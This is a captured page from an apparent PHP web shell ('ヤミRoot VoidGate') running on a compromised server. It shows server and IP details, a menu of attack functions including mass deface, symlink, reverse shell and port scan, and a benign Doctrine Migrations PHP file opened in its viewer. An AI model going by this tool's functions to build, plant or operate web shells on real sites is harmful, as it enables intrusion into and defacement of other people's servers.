ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
logercm
/
dev.loger.cm
/
vendor
/
doctrine
/
migrations
/
bin
/
Viewing: doctrine-migrations.php
<?php declare(strict_types=1); namespace Doctrine\Migrations; use Doctrine\Migrations\Tools\Console\ConsoleRunner; use Phar; use function extension_loaded; use function file_exists; use function fwrite; use const PHP_EOL; use const STDERR; (static function (): void { $autoloadFiles = [ __DIR__ . '/../vendor/autoload.php', __DIR__ . '/../../../autoload.php', ]; $autoloaderFound = false; foreach ($autoloadFiles as $autoloadFile) { if (! file_exists($autoloadFile)) { continue; } require_once $autoloadFile; $autoloaderFound = true; } if (! $autoloaderFound) { if (extension_loaded('phar') && Phar::running() !== '') { fwrite(STDERR, 'The PHAR was built without dependencies!' . PHP_EOL); exit(1); } fwrite(STDERR, 'vendor/autoload.php could not be found. Did you run `composer install`?' . PHP_EOL); exit(1); } $dependencyFactory = ConsoleRunner::findDependencyFactory(); ConsoleRunner::run([], $dependencyFactory); })();
Coded With 💗 by
0x6ick